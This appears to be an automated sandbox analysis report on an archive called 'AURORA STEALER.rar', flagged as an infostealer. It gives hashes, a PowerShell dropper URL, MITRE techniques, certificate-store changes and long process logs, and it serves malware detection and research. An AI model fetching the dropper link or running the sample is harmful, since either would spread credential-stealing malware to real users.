aurora | 282cd2c35141a47148dae9a17263d20edf209dca310112ebb11c47710091fdf7

Analysis

max time kernel
140s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
22-07-2024 16:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AURORA STEALER.rar
Size

10.9MB
MD5

7077d053f377ac289bde8e57de60f4a5
SHA1

779664f5ff55cd1035e58f2f5568e8a41a370288
SHA256

282cd2c35141a47148dae9a17263d20edf209dca310112ebb11c47710091fdf7
SHA512

9118b53f275784ad90a3a7bfc5cd578a51fb000bff5d9beab14a4c47b3e2ba8b7c005530c3871166172f6edf090c9763d811225bedeb2327c8034d2a67511a67
SSDEEP

196608:JXoE/rNj9hezMG/8YV8XUEQNar9lG45v/MdB3Nb2e9mMIF0HjS:JBpheIGEzHEi/kNb2esF9

Score

10^/10

aurora shurk execution infostealer stealer

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://rentry.org/sb54d2/raw

Signatures

Aurora
Aurora is a crypto wallet stealer written in Golang.
stealer aurora
Shurk
Shurk is an infostealer, written in C++ which appeared in 2021.
infostealer shurk

Shurk Stealer payload 11 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\AURORA STEALER\AURORA_STEALER\Aurora.exe	shurk_stealer
C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe	shurk_stealer
behavioral1/memory/4984-1562-0x0000000000400000-0x0000000001D8A000-memory.dmp	shurk_stealer
behavioral1/memory/2940-1576-0x00007FF7C7340000-0x00007FF7C8C4B000-memory.dmp	shurk_stealer
behavioral1/memory/3676-1612-0x0000000000400000-0x0000000001D8A000-memory.dmp	shurk_stealer
behavioral1/memory/4516-1625-0x00007FF668680000-0x00007FF669F8B000-memory.dmp	shurk_stealer
C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe	shurk_stealer
behavioral1/memory/2436-1649-0x0000000000400000-0x0000000001D8A000-memory.dmp	shurk_stealer
behavioral1/memory/5844-1661-0x00007FF68E0D0000-0x00007FF68F9DB000-memory.dmp	shurk_stealer
behavioral1/memory/3480-1683-0x0000000000400000-0x0000000001D8A000-memory.dmp	shurk_stealer
behavioral1/memory/3632-1684-0x00007FF7C1370000-0x00007FF7C2C7B000-memory.dmp	shurk_stealer

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

128 2448 powershell.exe
144 5920 powershell.exe

flow	pid	process
128	2448	powershell.exe
144	5920	powershell.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Aurora.exeblack.exeAurora.exeAurora.exeblack.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation	Aurora.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation	black.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation	Aurora.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation	Aurora.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation	black.exe

Executes dropped EXE 9 IoCs

Processes:

Aurora.exeAurora 22.12.2022_.exeblack.exeAurora.exeAurora 22.12.2022_.exeblack.exeAurora.exeAurora 22.12.2022_.exeblack.exe

pid	process
4984	Aurora.exe
2940	Aurora 22.12.2022_.exe
3692	black.exe
3676	Aurora.exe
4516	Aurora 22.12.2022_.exe
2844	black.exe
2436	Aurora.exe
5844	Aurora 22.12.2022_.exe
5940	black.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

2448 powershell.exe
5920 powershell.exe
1032 powershell.exe
2576 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exefirefox.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe

Modifies registry class 3 IoCs

Processes:

firefox.execmd.exeOpenWith.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\Local Settings	OpenWith.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

Aurora 22.12.2022_.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Aurora 22.12.2022_.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800001900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Aurora 22.12.2022_.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Aurora 22.12.2022_.exe

Suspicious behavior: EnumeratesProcesses 52 IoCs

Processes:

powershell.exetaskmgr.exepowershell.exe

pid	process
2448	powershell.exe
2448	powershell.exe
2448	powershell.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
5920	powershell.exe
5920	powershell.exe
5920	powershell.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

OpenWith.exe

pid process

4596 OpenWith.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

Processes:

firefox.exe7zG.exe7zG.exepowershell.exetaskmgr.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2152	firefox.exe
Token: SeDebugPrivilege	2152	firefox.exe
Token: SeRestorePrivilege	5392	7zG.exe
Token: 35	5392	7zG.exe
Token: SeSecurityPrivilege	5392	7zG.exe
Token: SeSecurityPrivilege	5392	7zG.exe
Token: SeRestorePrivilege	3128	7zG.exe
Token: 35	3128	7zG.exe
Token: SeSecurityPrivilege	3128	7zG.exe
Token: SeSecurityPrivilege	3128	7zG.exe
Token: SeDebugPrivilege	2448	powershell.exe
Token: SeDebugPrivilege	2028	taskmgr.exe
Token: SeSystemProfilePrivilege	2028	taskmgr.exe
Token: SeCreateGlobalPrivilege	2028	taskmgr.exe
Token: SeDebugPrivilege	5920	powershell.exe
Token: SeDebugPrivilege	2152	firefox.exe
Token: SeDebugPrivilege	2152	firefox.exe
Token: SeDebugPrivilege	2152	firefox.exe
Token: 33	2028	taskmgr.exe
Token: SeIncBasePriorityPrivilege	2028	taskmgr.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

firefox.exe7zG.exe7zG.exetaskmgr.exe

pid	process
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
5392	7zG.exe
3128	7zG.exe
2152	firefox.exe
2152	firefox.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

firefox.exetaskmgr.exe

pid	process
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2152	firefox.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe
2028	taskmgr.exe

Suspicious use of SetWindowsHookEx 46 IoCs

Processes:

OpenWith.exefirefox.exe

pid	process
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
4596	OpenWith.exe
2152	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

OpenWith.exefirefox.exefirefox.exe

description	pid	process	target process
PID 4596 wrote to memory of 4964	4596	OpenWith.exe	firefox.exe
PID 4596 wrote to memory of 4964	4596	OpenWith.exe	firefox.exe
PID 4964 wrote to memory of 2152	4964	firefox.exe	firefox.exe
PID 4964 wrote to memory of 2152	4964	firefox.exe	firefox.exe
PID 4964 wrote to memory of 2152	4964	firefox.exe	firefox.exe
PID 4964 wrote to memory of 2152	4964	firefox.exe	firefox.exe
PID 4964 wrote to memory of 2152	4964	firefox.exe	firefox.exe
PID 4964 wrote to memory of 2152	4964	firefox.exe	firefox.exe
PID 4964 wrote to memory of 2152	4964	firefox.exe	firefox.exe
PID 4964 wrote to memory of 2152	4964	firefox.exe	firefox.exe
PID 4964 wrote to memory of 2152	4964	firefox.exe	firefox.exe
PID 4964 wrote to memory of 2152	4964	firefox.exe	firefox.exe
PID 4964 wrote to memory of 2152	4964	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 1004	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 3132	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 3132	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 3132	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 3132	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 3132	2152	firefox.exe	firefox.exe
PID 2152 wrote to memory of 3132	2152	firefox.exe	firefox.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\AURORA STEALER.rar"
1⤵
- Modifies registry class
PID:3348

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4596

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\AppData\Local\Temp\AURORA STEALER.rar"
2⤵
- Suspicious use of WriteProcessMemory
PID:4964

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\AppData\Local\Temp\AURORA STEALER.rar"
3⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2152

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1964 -parentBuildID 20240401114208 -prefsHandle 1896 -prefMapHandle 1888 -prefsLen 25753 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {255ca822-40d3-480b-9327-f587583cd199} 2152 "\\.\pipe\gecko-crash-server-pipe.2152" gpu
4⤵
PID:1004

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2336 -parentBuildID 20240401114208 -prefsHandle 2400 -prefMapHandle 2396 -prefsLen 26673 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d8c28ea6-fb9c-4220-82b6-bceb437cc508} 2152 "\\.\pipe\gecko-crash-server-pipe.2152" socket
4⤵
PID:3132

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3360 -childID 1 -isForBrowser -prefsHandle 3420 -prefMapHandle 3276 -prefsLen 26814 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3232f438-8d34-45ec-9f10-e3b19adfb174} 2152 "\\.\pipe\gecko-crash-server-pipe.2152" tab
4⤵
PID:1540

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3612 -childID 2 -isForBrowser -prefsHandle 3636 -prefMapHandle 3632 -prefsLen 31163 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {438bedc0-588b-4131-a28a-2d5f10f0c68f} 2152 "\\.\pipe\gecko-crash-server-pipe.2152" tab
4⤵
PID:4036

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5332 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 5312 -prefMapHandle 5316 -prefsLen 29276 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b195af93-cc02-4220-a742-7013d91c2cb3} 2152 "\\.\pipe\gecko-crash-server-pipe.2152" utility
4⤵
- Checks processor information in registry
PID:5764

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5280 -childID 3 -isForBrowser -prefsHandle 5436 -prefMapHandle 5428 -prefsLen 27130 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {faaa1eec-85f9-414e-8207-f8c792207c87} 2152 "\\.\pipe\gecko-crash-server-pipe.2152" tab
4⤵
PID:5888

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5596 -childID 4 -isForBrowser -prefsHandle 5604 -prefMapHandle 5608 -prefsLen 27130 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e010fa25-7934-41db-853f-eb1e8edccf47} 2152 "\\.\pipe\gecko-crash-server-pipe.2152" tab
